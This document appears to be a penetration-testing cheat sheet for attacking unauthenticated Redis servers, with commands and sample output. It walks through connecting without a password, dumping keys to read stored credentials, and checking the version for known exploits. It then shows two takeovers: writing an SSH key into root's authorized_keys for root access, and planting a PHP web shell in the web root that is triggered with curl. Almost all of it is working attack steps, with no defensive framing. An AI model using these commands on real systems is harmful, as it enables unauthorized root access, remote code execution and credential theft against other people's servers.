Redis (6379)
Connect (no auth)
Try without password — Default: no authentication
redis-cli -h $IP
Example Output
redis-cli -h 10.10.10.5
10.10.10.5:6379> INFO server
redis_version:5.0.7
10.10.10.5:6379> KEYS *
1) "session:admin"
2) "credentials"
Dump all keys
After connecting — Stored credentials, session data
KEYS *
GET <key>
Example Output
KEYS *
1) "session:admin:token"
2) "user:admin:password"
3) "config:db_pass"
GET user:admin:password
"SuperSecret123!"
(Credentials stored in Redis)
Server info
Version, memory, clients — Check version for exploits
INFO
Example Output
INFO
redis_version:5.0.7
os:Linux 5.4.0-42-generic x86_64
connected_clients:2
(Check version for CVEs, 5.x has several RCEs)
Write SSH key
Write your SSH key to server — Root SSH access
redis-cli -h $IP
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET payload '<ssh-rsa key>'
SAVE
Example Output
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET payload 'ssh-rsa AAAA...your_key...'
SAVE
ssh root@10.10.10.5
root@target:~# whoami
root
(Root SSH access via Redis write)
Write webshell
If web server present — RCE via webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET payload '<?php system($_GET["cmd"]); ?>'
SAVE
Example Output
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET payload '<?php system($_GET["cmd"]); ?>'
SAVE
curl http://10.10.10.5/shell.php?cmd=whoami
www-data
(RCE via Redis webshell write)